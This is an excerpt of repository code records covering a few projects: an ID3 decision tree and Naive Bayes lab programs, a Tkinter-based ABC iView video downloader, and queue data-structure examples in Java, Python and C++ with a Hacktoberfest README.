25.90277862548828, "blob_id": "cf40965bfb14117f77060981e6ec29fcb43bf24a", "content_id": "b7a39afadc6cdc5d1e487b1dd3506d23bd877db2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3879, "license_type": "no_license", "max_line_length": 72, "num_lines": 144, "path": "/Program3/id3.py", "repo_name": "yashas123/VTU-15CSL76", "src_encoding": "UTF-8", "text": "import csv\nimport math\n\n\ndef 
majorClass(attributes,data,target):\n freq={}\n index=attributes.index(target)\n for tuple in data:\n if tuple[index] in freq:\n freq[tuple[index]]+=1\n else:\n freq[tuple[index]]=1\n max=0\n major=\"\"\t\n for key in freq.keys():\n if freq[key]>max:\n max=freq[key]\n major=key\n\t\t\n return major\n\t\ndef entropy(attributes,data,targetAttr):\n freq={}\n dataEntropy=0.0\n i=0\n for entry in attributes:\n if(targetAttr==entry):\n break\n i=i+1\n i=i-1\n for entry in data:\n if entry[i] in freq:\n freq[entry[i]]+=1.0\n else:\n freq[entry[i]]=1.0\n for freq in freq.values():\n dataEntropy+=(-freq/len(data))*math.log(freq/len(data),2)\n return dataEntropy\n\t\n\ndef info_gain(attributes,data,attr,targetAttr):\n freq={}\n subsetEntropy=0.0\n i=attributes.index(attr)\n for entry in data:\n if entry[i] in freq:\n freq[entry[i]]+=1.0\n else:\n freq[entry[i]]=1.0\n for val in freq.keys():\n valProb=freq[val]/sum(freq.values())\n dataSubset=[entry for entry in data if entry[i]==val]\n subsetEntropy+=valProb*entropy(attributes,dataSubset,targetAttr)\n return (entropy(attributes,data,targetAttr)-subsetEntropy)\n\t \ndef attr_choose(data,attributes,target):\n best=attributes[0]\n maxGain=0;\n for attr in attributes:\n newGain=info_gain(attributes,data,attr,target)\n if newGain>maxGain:\n maxGain=newGain\n best=attr\n return best\n\t\ndef get_values(data,attributes,attr):\n index=attributes.index(attr)\n values=[]\n for entry in data:\n if entry[index] not in values:\n values.append(entry[index])\n return values\n\t\ndef get_data(data,attributes,best,val):\n\tnew_data=[[]]\n\tindex=attributes.index(best)\n\tfor entry in data:\n\t\tif(entry[index]==val):\n\t\t\tnewEntry=[]\n\t\t\tfor i in range(0,len(entry)):\n\t\t\t\tif(i!=index):\n\t\t\t\t\tnewEntry.append(entry[i])\n\t\t\tnew_data.append(newEntry)\n\tnew_data.remove([])\n\treturn new_data\n\t\ndef build_tree(data,attributes,target):\n\tdata=data[:]\n\tvals=[record[attributes.index(target)] for record in data]\n\tdefault=majorClass(attributes,data,target)\n\tif not data or (len(attributes)-1)<=0:\n\t\treturn default\n\telif vals.count(vals[0])==len(vals):\n\t\treturn vals[0]\n\telse:\n\t\tbest=attr_choose(data,attributes,target)\n\t\ttree={best:{}}\n\t\tfor val in get_values(data,attributes,best):\n\t\t\tnew_data=get_data(data,attributes,best,val)\n\t\t\tnewAttr=attributes[:]\n\t\t\tnewAttr.remove(best)\n\t\t\tsubtree=build_tree(new_data,newAttr,target)\n\t\t\ttree[best][val]=subtree\n\treturn tree\n\t\ndef execute_decision_tree():\n data=[]\n with open(\"weather.csv\") as tsv:\n for line in csv.reader(tsv):\n data.append(tuple(line))\n print(\"Number of records:\",len(data))\n\t\t\n attributes=['outlook','temperature','humidity','wind','play']\n target=attributes[-1]\n\t\n acc=[]\n training_set=[x for i,x in enumerate(data)]\n tree=build_tree(training_set,attributes,target)\n print(tree)\n\t\n results=[]\n test_set=[('rainy','mild','high','strong')]\n for entry in test_set:\n tempDict=tree.copy()\n result=\"\"\n while(isinstance(tempDict,dict)):\n child=[]\n nodeVal=next(iter(tempDict))\n child=tempDict[next(iter(tempDict))].keys()\n tempDict=tempDict[next(iter(tempDict))]\n index=attributes.index(nodeVal)\n value=entry[index]\n if (value in tempDict.keys()):\n result=tempDict[value]\n tempDict=tempDict[value]\n else:\n result=\"Null\"\n break\n if result!=\"Null\":\n results.append(result==entry[-1])\n print(result)\n \nif __name__==\"__main__\":\n execute_decision_tree()\n\t\t\t\n\n" }, { "alpha_fraction": 0.7552447319030762, "alphanum_fraction": 
0.7692307829856873, "avg_line_length": 26.645160675048828, "blob_id": "19d0a47d72d64f7d21f77ebba0958c1141aad5c1", "content_id": "800746863c2d437823055a8e08067f9a442bfe29", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 858, "license_type": "no_license", "max_line_length": 71, "num_lines": 31, "path": "/Program6/Standard_P6.py", "repo_name": "yashas123/VTU-15CSL76", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom sklearn import metrics\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.metrics import accuracy_score, confusion_matrix\n\nc1,c2,c3,c4 = np.loadtxt('data.csv',unpack=True,delimiter = ',')\nx= np.column_stack((c1,c3))\ny= c4\n#Create NaiveBayes Classifier\nclf = GaussianNB()\n#fit the mode\nclf.fit(x,y)\n#make predictions\npredictions = clf.predict(x)\n\nprint('accuracy metrics')\n\n#calculate accuracy\nprint('accuracy of classifer is',metrics.accuracy_score(y,predictions))\nprint('confusion matrix')\nprint(confusion_matrix(y,predictions))\nprint('recall and precision')\nprint(metrics.recall_score(y,predictions))\nprint(metrics.precision_score(y,predictions))\nfrom matplotlib import pyplot as plt\n\nplt.scatter(c1, c3, c=c4)\nplt.colorbar(ticks=[1, 2])\nplt.xlabel(\"Age of the patient\")\nplt.ylabel(\"No of positive axillary nodes\")\nplt.show()\n\n" } ]
5
mohankumargupta/iviewultimate
https://github.com/mohankumargupta/iviewultimate
b4326c2b010fd6a3bbb6cffb2d870c4879b9dc27
7e0f4d2ca2c9a59d4b8bac34b21196baeaf39594
033106fe0e7273dfd41c385cacfb5399142669dc
refs/heads/master
2020-12-24T16:33:06.955916
2016-04-08T23:13:44
2016-04-08T23:13:44
34,769,340
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6522781848907471, "alphanum_fraction": 0.6594724059104919, "avg_line_length": 24.8125, "blob_id": "aecbfd337f81ab7ad6e1cc8f055b098efecbdd46", "content_id": "f25cc967945f432d573fdde77ce318b5c454f267", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 417, "license_type": "no_license", "max_line_length": 83, "num_lines": 16, "path": "/parser.py", "repo_name": "mohankumargupta/iviewultimate", "src_encoding": "UTF-8", "text": "from bs4 import BeautifulSoup\nimport requests\n\nclass IViewParser:\n\tdef __init__(self, url):\n\t\tr = requests.get(url)\n\t\tself.soup = BeautifulSoup(r.text);\n\n\tdef findAll(self, tag):\n\t\treturn self.soup.find_all(tag) \n\nif __name__ == '__main__':\n parser = IViewParser('https://tviview.abc.net.au/iview/feed/sony/?keyword=0-Z')\n allvideos = parser.findAll('asset')\n for i in range(2):\n \tprint(allvideos[i])\n \n" }, { "alpha_fraction": 0.7098039388656616, "alphanum_fraction": 0.7202614545822144, "avg_line_length": 30.875, "blob_id": "f1ef488914db4dee4a35f997e52e2e1d7cb3059c", "content_id": "96c13f59054a43d6d11f0f74925c67112de4bff0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1530, "license_type": "no_license", "max_line_length": 118, "num_lines": 48, "path": "/listing.py", "repo_name": "mohankumargupta/iviewultimate", "src_encoding": "UTF-8", "text": "import json\nimport requests\nimport tkinter as Tkinter\nfrom series import SeriesView\nimport iviewdownloader\n\nclass Listing:\n\tdef __init__(self, url):\n\t\tr = requests.get(url)\n\t\tself.listing = json.loads(r.text);\n\tdef getListing(self):\n\t\treturn self.listing\n\n\nclass ListingView:\n\tdef __init__(self, root, url):\n\t\tself.master = root\n\t\tself.frame = Tkinter.Frame(root)\n\t\troot.geometry(\"{}x{}\".format(800,600))\n\t\tscrollbar = Tkinter.Scrollbar(self.frame, orient=\"vertical\")\n\t\tlistbox = Tkinter.Listbox(self.frame, width=800, height=600,selectmode=Tkinter.SINGLE, yscrollcommand=scrollbar.set)\n\t\tlistbox.bind('<Double-Button-1>',self.callback )\n\t\tscrollbar.config(command=listbox.yview)\n\t\tlisting = Listing(url).getListing()\n\t\tself.listing = listing\n\t\tfor item in listing:\n\t\t\tlistbox.insert(Tkinter.END, item['b'])\n\t\tscrollbar.pack(side=\"right\", fill=\"y\")\n\t\tlistbox.pack(side=\"left\",fill=\"both\", expand=True)\n\t\tself.frame.pack()\n\t\tdownloader = iviewdownloader.IViewDownloader()\n\t\tdownloader.download()\n\n\tdef callback(self,event):\n\t\titemnumber = event.widget.curselection()[0]\n\t\titemvalue = event.widget.get(itemnumber)\n\t\tself.newWindow = Tkinter.Toplevel(self.master)\n\t\t#print(self.listing[itemnumber]['a'])\n\t\tnewurl = 'http://iview.abc.net.au/api/legacy/flash/?series={}'.format(self.listing[itemnumber]['a'])\n\t\t#print(newurl)\n\t\tSeriesView(self.newWindow, newurl)\n\t\t#print(itemvalue)\n\nif __name__ == '__main__':\n\tlisting = Listing()\n\tprint(len(listing.getListing()))\n\tprint(listing.getListing()[0])\n\tprint(listing.getListing()[0]['b'])\n" }, { "alpha_fraction": 0.625523030757904, "alphanum_fraction": 0.6380752921104431, "avg_line_length": 26.576923370361328, "blob_id": "9ae5358b328c7f9b2d2154735795da5557d2abc4", "content_id": "32e34348f618106bc0494bfdadb7a4fff26a96bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1434, "license_type": "no_license", "max_line_length": 78, "num_lines": 52, "path": "/iviewdownloader.py", 
"repo_name": "mohankumargupta/iviewultimate", "src_encoding": "UTF-8", "text": "import requests\nfrom bs4 import BeautifulSoup\nfrom time import sleep\nimport threading\nimport urllib3\nimport math\n\ndef run_in_thread(fn):\n def run(*k, **kw):\n t = threading.Thread(target=fn, args=k, kwargs=kw)\n t.start()\n return run\n\n@run_in_thread\ndef downloadIViewVideo(assetid, downloadurl):\n while not IViewDownloader.soup :\n print(\"sleeping for 10 seconds\")\n sleep(10)\n\n assets = IViewDownloader.soup.find_all('asset')\n\n for asset in assets:\n if (asset.find('id').contents[0] == assetid):\n url = asset.find('asseturl').contents[0]\n break\n\n request = urllib3.PoolManager().urlopen('GET', url, preload_content=False)\n with open(downloadurl,'wb') as out:\n filesize = request.getheaders()['content-length']\n blocksize = int(math.ceil(int(filesize)/100.))\n\n for progress in range(100):\n print(\"{}%\".format(progress))\n out.write(request.read(blocksize))\n\n print(\"100%\")\n request.release_conn()\n\nclass IViewDownloader:\n IVIEWFEED = 'https://tviview.abc.net.au/iview/feed/sony/'\n isDownloaded = False\n soup = None;\n\n def __init__(self):\n pass\n\n @run_in_thread\n def download(self):\n r = requests.get(IViewDownloader.IVIEWFEED, verify=False);\n IViewDownloader.soup = BeautifulSoup(r.text)\n IViewDownloader.isDownloaded = True;\n print('It has been downloaded')\n" }, { "alpha_fraction": 0.7764706015586853, "alphanum_fraction": 0.7764706015586853, "avg_line_length": 27.33333396911621, "blob_id": "d3a96b48ec658447de488bce48d64c3cfa60443d", "content_id": "91e57610cd4740c391a4b46f210dd117635ef8a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 170, "license_type": "no_license", "max_line_length": 74, "num_lines": 6, "path": "/iviewultimate.py", "repo_name": "mohankumargupta/iviewultimate", "src_encoding": "UTF-8", "text": "import tkinter as Tkinter\nfrom listing import ListingView\n\nroot = Tkinter.Tk()\nListingView(root, 'http://iview.abc.net.au/api/legacy/flash/?seriesIndex')\nroot.mainloop()\n" }, { "alpha_fraction": 0.6859986186027527, "alphanum_fraction": 0.7017844915390015, "avg_line_length": 31.0219783782959, "blob_id": "991c21b550922b109047129b5d65539b76bcac4d", "content_id": "5351bbda914a3139e3cfb4fbc898889065f3668d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2914, "license_type": "no_license", "max_line_length": 118, "num_lines": 91, "path": "/series.py", "repo_name": "mohankumargupta/iviewultimate", "src_encoding": "UTF-8", "text": "import json\nimport requests\nimport tkinter as Tkinter\nfrom bs4 import BeautifulSoup\nimport urllib3\nimport math\nimport iviewdownloader\nfrom tkinter import filedialog\n\nclass SeriesListing:\n\tdef __init__(self, url):\n\t\tr = requests.get(url)\n\t\tself.url = url\n\t\tself.listing = json.loads(r.text)\n\tdef getListing(self):\n\t\tseriesid = self.url.split(\"series=\")[1]\n\t\titemindex = 0\n\t\tfor item in self.listing:\n\t\t\tif (item['a'] == seriesid):\n\t\t\t\treturn item['f']\n\t\t\titemindex = itemindex + 1\n\t\treturn self.listing[0]['f']\n\n\nclass SeriesView:\n\tdef __init__(self, root, url):\n\t\tself.master = root\n\t\tself.frame = Tkinter.Frame(root)\n\t\troot.geometry(\"{}x{}\".format(800,600))\n\t\tself.entryText = Tkinter.StringVar()\n\t\tentry = Tkinter.Entry(self.frame, textvariable=self.entryText, width=200, state=Tkinter.DISABLED)\n\t\tchangedirbutton = Tkinter.Button(self.frame, text=\"Change\", 
command=self.changeDirectory)\n\t\tscrollbar = Tkinter.Scrollbar(self.frame, orient=\"vertical\")\n\t\tlistbox = Tkinter.Listbox(self.frame, width=800, height=600,selectmode=Tkinter.SINGLE, yscrollcommand=scrollbar.set)\n\t\tlistbox.bind('<Double-Button-1>',self.callback )\n\t\tscrollbar.config(command=listbox.yview)\n\t\tlisting = SeriesListing(url).getListing()\n\t\tself.listing = listing\n\t\tfor item in listing:\n\t\t\tlistbox.insert(Tkinter.END, item['b'])\n\t\tentry.pack()\n\t\tchangedirbutton.pack()\n\t\tscrollbar.pack(side=\"right\", fill=\"y\")\n\t\tlistbox.pack(side=\"left\",fill=\"both\", expand=True)\n\t\tself.frame.pack()\n\n\tdef changeDirectory(self):\n\t\tdirectory = filedialog.askdirectory()\n\t\tself.entryText.set(directory)\n\n\tdef callback(self,event):\n\t\titemnumber = event.widget.curselection()[0]\n\t\titemvalue = event.widget.get(itemnumber)\n\t\tprint(self.listing[itemnumber]['a'])\n\t\tprint(self.listing[itemnumber]['b'])\n\t\tprint(self.listing[itemnumber]['n'])\n\t\tprint(self.listing[itemnumber]['s'])\n\t\tassetid = self.listing[itemnumber]['s'].rsplit('/',1)[1][:13]\n\t\t#print(assetid)\n\t\t#self.downloadVideo(assetid)\n\t\tiviewdownloader.downloadIViewVideo(assetid, self.entryText.get() + '/' + self.listing[itemnumber]['b'] + \".mp4\")\n\n\n\tdef downloadVideo(self,assetid):\n\t\tr = requests.get('https://tviview.abc.net.au/iview/feed/sony/', verify=False);\n\t\tsoup = BeautifulSoup(r.text)\n\t\tassets = soup.find_all('asset')\n\t\tfor asset in assets:\n\t\t\tif (asset.find('id').contents[0] == assetid):\n\t\t\t\turl = asset.find('asseturl').contents[0]\n\t\t\t\tbreak\n\n\t\t#url = assets[1].find('asseturl').contents[0];\n\t\tprint(url)\n\t\trequest = urllib3.PoolManager().urlopen('GET', url, preload_content=False)\n\t\twith open('boo.mp4','wb') as out:\n\t\t\tfilesize = request.getheaders()['content-length']\n\t\t\tblocksize = int(math.ceil(int(filesize)/100.))\n\t\t\tfor progress in range(100):\n\t\t\t\tprint(\"{}%\".format(progress))\n\t\t\t\tout.write(request.read(blocksize))\n\t\tprint(\"100%\")\n\t\trequest.release_conn()\n\n\t\t#print(ids[1].string)\n\t\t#print(assets[1].find('asseturl').contents[0])\n\t\t#print(r.text)\n\n\nif __name__ == '__main__':\n\tpass\n" } ]
5
adinimbarte/Queue
https://github.com/adinimbarte/Queue
07c416d49bf71e6daa7abdea66da2fb671b18828
ac08bbd45eec8c6753820ebfae40a3fec4469009
cd7545bfe7f69f5d56b4f40064d5624ed98ff709
refs/heads/main
2023-08-05T15:19:13.291573
2021-10-04T16:29:26
2021-10-04T16:29:26
412,441,515
1
10
null
2021-10-01T11:33:27
2021-10-04T09:30:17
2021-10-04T16:29:26
C++
[ { "alpha_fraction": 0.6863194108009338, "alphanum_fraction": 0.6971951723098755, "avg_line_length": 31.370370864868164, "blob_id": "657aa5ed9ddb0fd0a8fb5bbf2e72497b77be76f3", "content_id": "6f2fd642fb4ecd2e3ee7a4355e3b3f6507d6a2ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1747, "license_type": "no_license", "max_line_length": 313, "num_lines": 54, "path": "/Queue In Java/queue.java", "repo_name": "adinimbarte/Queue", "src_encoding": "UTF-8", "text": "// The Queue interface present in the java.util package and extends the Collection interface is used to hold the elements about to be processed in FIFO(First In First Out) order.\n// It is an ordered list of objects with its use limited to insert elements at the end of the list and deleting elements from the start of the list, (i.e.), it follows the FIFO or the First-In-First-Out principle.\n// Being an interface the queue needs a concrete class for the declaration and the most common classes are the PriorityQueue and LinkedList in Java.It is to be noted that both the implementations are not thread safe. PriorityBlockingQueue is one alternative implementation if thread safe implementation is needed.\n// Declaration: The Queue interface is declared as:\n// Java program to demonstrate a Queue\n\nimport java.util.LinkedList;\nimport java.util.Queue;\n\npublic class QueueExample {\n\n\tpublic static void main(String[] args)\n\t{\n\t\tQueue<Integer> q\n\t\t\t= new LinkedList<>();\n\n\t\t// Adds elements {0, 1, 2, 3, 4} to\n\t\t// the queue\n\t\tfor (int i = 0; i < 5; i++)\n\t\t\tq.add(i);\n\n\t\t// Display contents of the queue.\n\t\tSystem.out.println(\"Elements of queue \"\n\t\t\t\t\t\t+ q);\n\n\t\t// To remove the head of queue.\n\t\tint removedele = q.remove();\n\t\tSystem.out.println(\"removed element-\"\n\t\t\t\t\t\t+ removedele);\n\n\t\tSystem.out.println(q);\n\n\t\t// To view the head of queue\n\t\tint head = q.peek();\n\t\tSystem.out.println(\"head of queue-\"\n\t\t\t\t\t\t+ head);\n\n\t\t// Rest all methods of collection\n\t\t// interface like size and contains\n\t\t// can be used with this\n\t\t// implementation.\n\t\tint size = q.size();\n\t\tSystem.out.println(\"Size of queue-\"\n\t\t\t\t\t\t+ size);\n\t}\n}\n\n\n// OUTPUT:\n// Elements of queue [0, 1, 2, 3, 4]\n// removed element-0\n// [1, 2, 3, 4]\n// head of queue-1\n// Size of queue-4" }, { "alpha_fraction": 0.7017995119094849, "alphanum_fraction": 0.7043702006340027, "avg_line_length": 18.299999237060547, "blob_id": "55564c3282e5975e60d5b0712e0c2e779997d5c0", "content_id": "048cd61ac16dfce9a007671f5a6879a5ebcb1c62", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 389, "license_type": "no_license", "max_line_length": 43, "num_lines": 20, "path": "/Python/Queue.py", "repo_name": "adinimbarte/Queue", "src_encoding": "UTF-8", "text": "from queue import Queue\n \n# Initializing a queue\nqueue = Queue(maxsize = 5)\n \nprint(queue.qsize())\n \n# Adding of element to queue\nqueue.put('apples')\nqueue.put('banana')\nqueue.put('carrot')\n \n# Removing element from queue\nprint(\"\\nElements dequeued from the queue\")\nprint(queue.get())\nprint(queue.get())\nprint(queue.get())\n \n# Return Boolean for Empty\nprint(\"\\nEmpty: \", queue.empty())\n \n " }, { "alpha_fraction": 0.6779381632804871, "alphanum_fraction": 0.6931958794593811, "avg_line_length": 32.69444274902344, "blob_id": "76b893937a0d9900804464a05250dd6e9ca94401", "content_id": 
"318c265085136637e428f707a6ff6802aebb2ebe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2439, "license_type": "no_license", "max_line_length": 232, "num_lines": 72, "path": "/Queue in C++/queue.cpp", "repo_name": "adinimbarte/Queue", "src_encoding": "UTF-8", "text": "// Introduction to Queue\n// Queues are a type of container adaptors which operate in a first in first out (FIFO) type of arrangement. Elements are inserted at the back (end) and are deleted from the front. Queues use an encapsulated object of deque or list \n// (sequential container class) as its underlying container, providing a specific set of member functions to access its elements.\n\n\n/*\nMethods of Priority Queue :\n1. empty() – This method checks whether the priority_queue container is empty or not. If it is empty, return true, else false. It does not take any parameter.\nsyntax : p1.empty() \n2.size() – This method gives the number of elements in the priority queue container. It returns the size in an integer. It does not take any parameter.\nsyntax : p2.size() \n3. push() – This method inserts the element into the queue. Firstly, the element is added to the end of the queue, and simultaneously elements reorder themselves with priority. It takes value in the parameter.\nsyntax : p3.push(value) \n4.pop() – This method delete the top element (highest priority) from the priority_queue. It does not take any parameter.\nsyntax : p3.pop()\n5.swap() – This method swaps the elements of a priority_queue with another priority_queue of the same size and type. It takes the priority queue in a parameter whose values need to be swapped.\nsyntax : p3.swap(p1) \n6.top() – This method gives the top element from the priority queue container. It does not take any parameter.\nsyntax : p3.top() \n7.emplace() – This method adds a new element in a container at the top of the priority queue. 
It takes value in a parameter.\nsyntax : p3.emplace(value) \n\n*/\n// Queue in Standard Template Library (STL)\n#include <iostream>\n#include <queue>\n\nusing namespace std;\n\n// Print the queue\nvoid showq(queue<int> gq)\n{\n\tqueue<int> g = gq;\n\twhile (!g.empty()) {\n\t\tcout << '\\t' << g.front();\n\t\tg.pop();\n\t}\n\tcout << '\\n';\n}\n\n// Driver Code\nint main()\n{\n\tqueue<int> gquiz;\n\tgquiz.push(10);\n\tgquiz.push(20);\n\tgquiz.push(30);\n\n\tcout << \"The queue gquiz is : \";\n\tshowq(gquiz);\n\n\tcout << \"\\ngquiz.size() : \" << gquiz.size();\n\tcout << \"\\ngquiz.front() : \" << gquiz.front();\n\tcout << \"\\ngquiz.back() : \" << gquiz.back();\n\n\tcout << \"\\ngquiz.pop() : \";\n\tgquiz.pop();\n\tshowq(gquiz);\n\n\treturn 0;\n}\n\n/* Output: \nThe queue gquiz is : 10 20 30\n\ngquiz.size() : 3\ngquiz.front() : 10\ngquiz.back() : 30\ngquiz.pop() : 20 30\n\n\n*/" }, { "alpha_fraction": 0.47593581676483154, "alphanum_fraction": 0.5037432909011841, "avg_line_length": 10.390243530273438, "blob_id": "1cfcf6bf6568f9fd4e48b631430bd8c9bd82d1f1", "content_id": "8f2a6de15bf4706de4b8106b02bd7433e7947004", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 935, "license_type": "no_license", "max_line_length": 55, "num_lines": 82, "path": "/Queue in C++/Q_2stacks.cpp", "repo_name": "adinimbarte/Queue", "src_encoding": "UTF-8", "text": "\n/* \ncpp program to implement queue using two stacks.\nTime complexities:\nenqueue : O(n)\ndequeue : O(1)\ndisplay : O(n)\n*/\n\n#include<bits/stdc++.h>\n#include<iostream>\nusing namespace std;\n\n\nclass Queue{\n\tpublic:\n\t\tstack<int>s1;\n\t\tstack<int>s2;\n\t\t\n\t\tvoid enqueue(int n)\n\t\t{\n\t\t\twhile(!s1.empty())\n\t\t\t{\n\t\t\t\ts2.push(s1.top());\n\t\t\t\ts1.pop();\t\n\t\t\t}\t\n\t\t\t\n\t\t\ts1.push(n);\n\t\t\twhile(!s2.empty())\n\t\t\t{\n\t\t\t\ts1.push(s2.top());\n\t\t\t\ts2.pop();\n\t\t\t}\n\t\t}\n\t\t\n\t\tvoid dequeue()\n\t\t{\n\t\t\tif(s1.empty())\n\t\t\t{\n\t\t\t\tcout<<\"queue already empty, invalid operation\\n\\n\";\n\t\t\t\treturn;\n\t\t\t}\n\t\t\t\n\t\t\ts1.pop();\n\t\t\t\n\t\t}\n\t\t\n\t\tvoid display()\n\t\t{\n\t\t\twhile(!s1.empty())\n\t\t\t{\n\t\t\t\tcout<<s1.top()<<\" \";\n\t\t\t\ts2.push(s1.top());\n\t\t\t\ts1.pop();\n\t\t\t}\n\t\t\t\n\t\t\tcout<<endl;\n\t\t\t\n\t\t\t\n\t\t\twhile(!s2.empty())\n\t\t\t{\n\t\t\t\ts1.push(s2.top());\n\t\t\t\ts2.pop();\n\t\t\t}\n\t\t}\n\t\t\n\t\t\n};\n\n\n\nint main()\n{\n\tQueue q;\n\t\n\t// sample runs\n\tq.enqueue(2);\n\tq.enqueue(3);\n\tq.display();\n\tq.dequeue();\n\tq.display();\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.699907660484314, "alphanum_fraction": 0.7165281772613525, "avg_line_length": 23.636363983154297, "blob_id": "6ed01538fd73cad84546d58cd63f728529a14872", "content_id": "5d134bbaa2a1e141b5712ce8fcddad9e306efe39", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1083, "license_type": "no_license", "max_line_length": 103, "num_lines": 44, "path": "/README.md", "repo_name": "adinimbarte/Queue", "src_encoding": "UTF-8", "text": "# Queue\n# HacktoberFest 2021\n\n## This repo will be partcipating in the [Hacktoberfest](https://hacktoberfest.digitalocean.com/) 2021.\n\n![](https://hacktoberfest.digitalocean.com/_nuxt/img/logo-hacktoberfest-full.f42e3b1.svg)\n\n<h4>Readme Credit goes to <a href=\"https://github.com/adinimbarte\">@adinimbarte</a> </h3>\n <br>\n\n\nThis is a beginners repository for anyone wishing to contribute to HacktoberFest 2021\n\n - Fork the 
repository\n - Clone your fork and Create a new branch\n - Add your program\n - Generate your Pull Request\n - Magic\n\n### Important Note:\nPlease commit your files in the respective folders. \n\nEx:- `.py` files must go in `python/` folder and others in `misc` folder.\n\n### Process\n< Added Unique program > // please change this accordingly\n\n```sh\n$ git clone <URL>\n$ cd <FolderName>\n$ git branch <new_branch>\n$ git checkout <new_branch>\n```\n\nAdd your Program\n\n```sh\n$ git add .\n$ git commit -m \"<Commit MESSAGE>\"\n$ git push origin <new_branch>\n```\nGo and Generate your first Pull request from Github\n\n### THANKS A LOT FOR YOUR SUPPORT!! REALLY HELPS ME A LOT!" } ]
5
Sandy4321/Feature_Engineering
https://github.com/Sandy4321/Feature_Engineering
a6103170af487e323b657d51f939b9942865f92a
306846f17daaae097adfeafee518439743c2e79f
d1688c5827a14c9e3703d49ce75f7d4b00695f56
refs/heads/master
2021-01-24T23:24:37.764794
2015-03-07T05:48:10
2015-03-07T05:48:10
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5535783171653748, "alphanum_fraction": 0.5678916573524475, "avg_line_length": 31.721519470214844, "blob_id": "37d7ce145a8106b74d6456a137ace12f03e40d66", "content_id": "98e2e1d29075cd7bf2ce59f16440c32b35e42bd1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2585, "license_type": "no_license", "max_line_length": 147, "num_lines": 79, "path": "/Hashing_Trick/hashing_trick.py", "repo_name": "Sandy4321/Feature_Engineering", "src_encoding": "UTF-8", "text": "import sys\nimport argparse\n# Usage: 'python hashing_trick.py path_to_data [flag]'\n# The format of the data should be the same as libsvm\n# Flag:\n# 1(default) unsigned_hashing\n# 2 signed_hashing\n# 3 multiple_hashing\n\nclass hashing_trick:\n '''\n\n Hashing trick is used to decrease the feature dimension such that the features can be stored into memory.\n\n Parameters\n ----------\n \n path : string, \n Input path of data with format like libsvm\n\n N : int, optional(default 10000)\n The feature dimension after being hashed\n\n flag : int, optional(default 1)\n The flag tells which kind of hashing trick algorithm is used\n 1: unsigned hashing\n 2: signed hashing\n 3: multiple hashing\n\n '''\n \n def __init__(self, path, N, flag):\n self.path = path\n self.N = N\n self.flag = flag\n self.res_lst = []\n\n def hash_features(self):\n for line in open(self.path):\n row = line.strip().split(' ')\n d = {}\n if self.flag == 1:\n d = self.unsigned_hashing(row[1:])\n elif self.flag == 2:\n d = self.signed_hashing(row[1:])\n elif self.flag == 3:\n d = self.multiple_hashing(row[1:])\n sort = sorted(d.iteritems(), key = lambda dd: dd[0])\n self.res_lst.append([row[0], sort])\n for res in self.res_lst:\n print res\n\n def unsigned_hashing(self, lst):\n d = {}\n for l in lst:\n (index, value) = map(float, l.split(':'))\n index_hashed = hash('feature' + str(index)) % self.N\n d.setdefault(index_hashed, 0.0)\n d[index_hashed] += value\n return d\n\n\n def signed_hashing(self, lst):\n d = {}\n for l in lst:\n (index, value) = map(float, l.split(':'))\n index_hashed = hash('feature' + str(index)) % self.N\n sign = hash('sign' + str(index)) % 2\n d.setdefault(index_hashed, 0.0)\n d[index_hashed] += (2 * sign - 1) * value\n return d\nparser = argparse.ArgumentParser(description = 'Options for this script')\nparser.add_argument('-i', dest = 'path_input', help = 'input path')\nparser.add_argument('-N', default = 10000, type = int, help = 'number of indexes after hashing')\nparser.add_argument('-f', dest = 'flag', default = 1, type = int, help = 'flag, 1 is unsigned hashing, 2 is signed hashing, 3 is multiple hashing')\n\nargs = parser.parse_args(sys.argv[1:])\nht = hashing_trick(args.path_input, args.N, args.flag)\nht.hash_features()\n" } ]
1
VasilievArtyom/MLwarrior
https://github.com/VasilievArtyom/MLwarrior
9240e2f276382e2a2c05b985ecee9abc4f0f55ae
f9ba3b215746ae63c1cc3a21fd20718e59315a0c
bc0ed05a1dac8eed8dc1ad03e8ed333a2cea83f8
refs/heads/master
2021-02-05T15:16:55.198811
2020-03-02T17:24:42
2020-03-02T17:24:42
243,797,374
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.5808257460594177, "alphanum_fraction": 0.616515040397644, "avg_line_length": 27.390727996826172, "blob_id": "ddf7a8e356efe989c18ed810b5f98caae0d9fc6d", "content_id": "1aa56de5723675a49d1d316849c6bb9ce80c74ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4291, "license_type": "no_license", "max_line_length": 89, "num_lines": 151, "path": "/predict.py", "repo_name": "VasilievArtyom/MLwarrior", "src_encoding": "UTF-8", "text": "import math\nimport numpy as np\nfrom numpy import *\nfrom os import path\nimport matplotlib.pyplot as plt\nfrom statsmodels.tsa.arima_model import ARIMA\nimport statsmodels.api as sm\nimport itertools\nimport warnings\n\n\nplt.rc('text', usetex=True)\n\noutpath = \"plots\"\ninpath = \"\"\n\ncurrentfile = \"data.txt\"\n\n# Read from file\nfulln, fullW= np.loadtxt(path.join(inpath, currentfile), usecols=(0, 1), unpack=True)\n\nn = fulln[65:1003]\nW = fullW[65:1003]\n\n\n\n# # fit model\n# p = d = q = range(0, 15)\n# pdq = list(itertools.product(p, d, q))\n# warnings.filterwarnings(\"ignore\")\n# f = open('hyperparam.txt','w') \n# for param in 